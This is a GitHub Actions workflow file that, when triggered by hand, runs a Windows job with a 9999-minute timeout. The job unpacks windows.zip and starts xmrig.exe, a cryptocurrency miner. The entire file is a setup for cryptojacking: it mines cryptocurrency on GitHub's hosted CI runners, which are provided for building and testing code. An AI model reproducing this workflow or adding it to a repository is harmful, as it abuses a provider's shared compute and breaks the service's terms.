name: miner

on: 
  workflow_dispatch:

jobs:
  build:
    name: start mine
    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: starting miner
      run: |
        Expand-Archive windows.zip
        windows/xmrig.exe
